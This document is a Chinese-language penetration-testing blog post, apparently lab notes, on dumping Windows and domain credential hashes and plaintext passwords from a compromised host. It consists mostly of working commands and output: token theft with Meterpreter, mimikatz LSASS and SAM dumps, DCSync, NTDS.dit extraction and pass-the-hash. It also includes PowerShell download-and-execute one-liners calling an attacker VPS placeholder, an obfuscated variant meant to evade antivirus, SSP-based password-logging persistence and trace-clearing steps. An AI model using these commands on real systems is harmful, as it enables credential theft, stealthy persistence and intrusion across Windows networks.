导出Hash以及查看明文密码的几种方法

导出Hash以及查看明文密码的几种方法

实验环境:kali,win10,win server 2012 R2

假设已经获取win10主机权限,记录一些方法获取主机的用户hash以创造突破

image-20221111164636914

windows中令牌窃取只有特权用户才能进行,即要求用户必须拥有SeImpersionatePrivilege和SeAssignPrimaryTokenPrivilege/SeIncreaseQuotaPrivilege特权,获得主机权限后,可以通过whoami /priv查看用户具备的权限

image-20221111164622568

主机hash

MSF

smart_hashdump

MSF内置模块:post/windows/gather/smart_hashdump,注意前置条件:system权限

image-20221111162625832

hashdump

值得注意的事,如果getsystem之后仍然无法获得hash,尝试migrate到一个拥有system权限的进程上再执行hashdump

ps查看目标主机进程

image-20221111163839924

migrate进行迁移

image-20221111163750515

incognito

题外话,通过incognito模块窃取系统管理员令牌然后执行其他hash导出操作

meterpreter > load incognito 
Loading extension incognito...Success.
meterpreter > list_tokens -u //列出可用令牌
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
DESKTOP-3U0MUK9\chen
NT AUTHORITY\IUSR
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
NT AUTHORITY\ANONYMOUS LOGON
NT AUTHORITY\NETWORK SERVICE
Window Manager\DWM-1

meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > steal_token 8720  //ps查看system进程
Stolen token with username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 4976 created.
Channel 1 created.
Microsoft Windows [�汾 10.0.19042.1706]
(c) Microsoft Corporation����������Ȩ����

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>

mimikatz

借助mimikatz工具,直接或间接的得到目标hash

内置

pwd查看当前路径,upload上传mimikatz.exe

image-20221111171107708

进入路径执行命令,找到mimikatz.exe

若当前权限为非管理员,需执行以下命令提升权限

image-20221111172123290

若拥有了管理员权限,只需执行sekurlsa::logonpasswords fulllsadump::sam命令即可

image-20221111172414138

image-20221111172359873

还可以通过reg的save选项将注册表中的SAM,System文件导出到本地,而后离线导出

C:\Users\chen\Desktop>reg save hklm\sam sam.hive
reg save hklm\sam sam.hive
The operation completed successfully.

C:\Users\chen\Desktop>reg save hklm\system system.hive
reg save hklm\system system.hive
The operation completed successfully.

C:\Users\chen\Desktop>mimikatz.exe
mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # lsadump::sam /sam:sam.hive /system:system.hive
Domain : DESKTOP-3U0MUK9
SysKey : d12d3127527d07224c3c4b97ca581262
Local SID : S-1-5-21-2691107070-1375161855-337516022

SAMKey : a9248f1b904d324a1efa1d3e622fbb1a

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0

RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount
  Hash NTLM: 9db5b04bca62e7fc1930392b2fe75014

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : afc9f9d944f1000fb8e91aa6c0eb9936

* Primary:Kerberos-Newer-Keys *
    Default Salt : DESKTOP-3U0MUK9WDAGUtilityAccount
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : fa2e99e95122dd2c083ef2e8ccf4d859f750e03652a939ce8490a91ebc954a5b
      aes128_hmac       (4096) : 96ab0404767d84872ec1d26835ed7a57
      des_cbc_md5       (4096) : 23d3b3e00d1358e5

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : DESKTOP-3U0MUK9WDAGUtilityAccount
    Credentials
      des_cbc_md5       : 23d3b3e00d1358e5

RID  : 000003e9 (1001)
User : chen
  Hash NTLM: 32ed87bdb5fdc5e9cba88547376818d4

票据导出

将票据导出

kerberos::list /export

image-20221204163422342

可利用Hashcat等爆破

第三方工具

Procdump

procdump是微软官方提供的工具,因此一般处于检测白名单之内。官网下载地址:https://learn.microsoft.com/en-us/sysinternals/downloads/procdump

上传procdump.exe到目标主机,执行如下命令

procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp

image-20221115161306433

下载到本地,mimikatz读取

image-20221115161845569

SQLDumper

同样具有微软的签名(360、卡巴斯基无法抓取)

tasklist /svc | findstr "lsass.exe"

SqlDumper.exe pid 0 0x01100

powershell

本地

powershell -nop -exec bypass Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"'
powershell -nop -exec bypass Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::sam"'

远程(可配合其他框架如nishang、empire、powerspliot)

powershell -nop -exec bypass -c "iex(New-Object Net.webclient).downloadstring('http://vps-ip:port/InvokeMimikatz.ps1');Invoke-Mimikatz –DumpCred

混淆

powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'x.xx.xxx'+'.xx:xxxx/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvokeMimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"

域hash

此处环境为windows server 2012 R2

MSF

首先当然是最直接的hashdump

image-20221121170658034

另外有个专门的模块

use post/windows/gather/credentials/domain_hashdump(失败)

不知道为啥导不出ntds

image-20221121170630451

成功应该是这样

32metasploit-domain-hashdump.png

mimikatz

lsadump::dcsync /domain:pentestlab.local /all /csv

image-20221121161507247

指定用户查询,记得加$,如果不确定用户名,执行net group "domain computers" /domain查看

lsadump::dcsync /domain:aim.com /user:jack$

image-20221121161947500

利用lsass.exe

privilege::debug
lsadump::lsa /inject

image-20221121162055786

DCSync

https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-DCSync.ps1

powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.232.128:3122/Invoke-DCSync.ps1')";Invoke-DCSync -PWDumpFormat > hash.txt

msf内加载powershell模块(为啥报错捏,俺也不知道)

image-20221121163157689

或加上参数-PWDumpFormat

image-20221121163359203

ntdsutil

依次执行如下命令

ntdsutil.exe snapshot "activate instance ntds" create q q

image-20221122130816036

复制GUID,执行

ntdsutil.exe snapshot "mount {f558e268-3e8d-49f0-9421-b322b38cf0c5}" q q

image-20221122130914913

复制目录路径,执行

copy 'C:\$SNAP_202211221302_VOLUMEC$\Windows\NTDS\ntds.dit' C:\Users\admin\ntds.dit

image-20221122131447654

之后就可以进行离线破解

清除痕迹:

ntdsutil.exe snapshot "List All" q q

image-20221122131632321

ntdsutil.exe snapshot "umount {167c0406-0f3f-434e-93a6-52e77c8cd4c9}" "delete {167c0406-0f3f-434e-93a6-52e77c8cd4c9}" q q

有几组卸几组

image-20221122131945976

vshadow

复制ntds.dit、sam或者system文件

vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\system.hiv
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\sam.hiv

执行完毕后会在C盘根目录生辰一个ShadowCopy文件以及sam.hiv

image-20221121164600483

image-20221121165704117

download出来利用impacket中的secretsdump.py破解,system.hiv是必须的,它包含了解密NTDS文件内容所需的密钥

impacket-secretsdump -ntds ShadowCopy -system system.hiv LOCAL

image-20221121165726844

获取hash之后就可以利用wmic之类的进行登录了

impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:b3eefb3c06e2ce5b98066f3c1f00e730 aim.com/administrator@192.168.232.135 -codec gbk

image-20221121171445514

Vshadow + ShadowCopy + QuarksPwDum

上传vshadow.exe,exp.bat到同一目录下,这有个坑,一开始用了32位的vshadow.exe失败了很多次,换了64位

exp.bat

setlocal
if NOT "%CALLBACK_SCRIPT%"=="" goto :IS_CALLBACK
set SOURCE_DRIVE_LETTER=%SystemDrive%
set SOURCE_RELATIVE_PATH=\windows\ntds\ntds.dit
set DESTINATION_PATH=%~dp0
@echo ...Determine the scripts to be executed/generated...
set CALLBACK_SCRIPT=%~dpnx0
set TEMP_GENERATED_SCRIPT=GeneratedVarsTempScript.cmd
@echo ...Creating the shadow copy...
"%~dp0vshadow.exe" -script=%TEMP_GENERATED_SCRIPT% -exec="%CALLBACK_SCRIPT%" %SOURCE_DRIVE_LETTER%
del /f %TEMP_GENERATED_SCRIPT%
@goto :EOF
:IS_CALLBACK
setlocal
@echo ...Obtaining the shadow copy device name...
call %TEMP_GENERATED_SCRIPT%
@echo ...Copying from the shadow copy to the destination path...
copy "%SHADOW_DEVICE_1%\%SOURCE_RELATIVE_PATH%" %DESTINATION_PATH%

执行bat

image-20221122135219592

image-20221122135232395

win server 2012 R2能用的64位vshadow:

https://www.exefiles.com/zh-cn/exe/vshadow-exe/

image-20221122135319825

修复复制出来的数据库

image-20221122135352052

esentutl /p /o ntds.dit1

image-20221122135407514

配合system.hive,QuarksPwDump读取信息导出结果,可以离线,当然也可以把QPD传上去

QuarksPwDump.exe --dump-hash-domain --with-history --ntds-file c:\ntds.dit --system-file c:\system.hive -o c:\res.txt 一定要注意这里要给绝对路径,选项参数之间只能有一个空格

image-20221122135553555

获取明文密码

一些方法可以用作权限维持

实验环境:kali,windows server 2012 R2

修改注册表

修改成记录明文密码,实际是windows开启Wdigest Auth

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

命令使得用户锁屏,在windows server 2012下,rundll32.exe位于C://windows/SysWOW64

rundll32.exe user32.dll,LockWorkStation

或者等待下一次用户自行锁屏重新输入密码登录

上传mimikatz.exe,即可看到wdigest中记录的明文密码

image-20221204143248714

恢复修改不记录明文密码

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

强制锁屏还可使用powershell脚本

powershell -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/kiraly15/Lock-WorkStation/master/Lock-WorkStation.ps1');"

其内容如下:

Function Lock-WorkStation 
{
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation

ps:题外话

powershell降级

-version 2

mimikatz_ssp记录密码

上传mimikatz.exe,执行如下命令

privilege::debug
misc::memssp

锁屏重新登录,system32目录下会生成一个mimilsa.log

image-20221204152647097

或者使用Invoke-Mimikatz.ps1

Import-Module .\Invoke-Mimikatz.ps1  //导入命令
Invoke-Mimikatz -Command "misc::memssp"  //不需要重启获取 记录的明文密码存储在这个路径下

mimilib.dll+修改注册表

mimikatz仓库下存在文件mimilib.dll,上传该文件至lsass.exe同目录即c:\windows\system32下,mimilib.dll存在32位和64位两个版本,根据系统位数上传

image-20221204153141910

修改注册表

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "Security Packages" /t REG_MULTI_SZ /d mimilib.dll /f

image-20221204153155934

等待目标重启系统,再查看目录下出现了一个kiwissp.log

image-20221204153722219

并且文件会随时记录你登录锁屏的密码

image-20221204153828058

Hook PasswordChangeNotify

https://github.com/Al1ex/Hook-PasswordChangeNotify

CVE-2021-36934

HiveNightmare: https://github.com/GossiTheDog/HiveNightmare

Windows Error Reporting service

https://github.com/deepinstinct/Lsass-Shtinkering

发表评论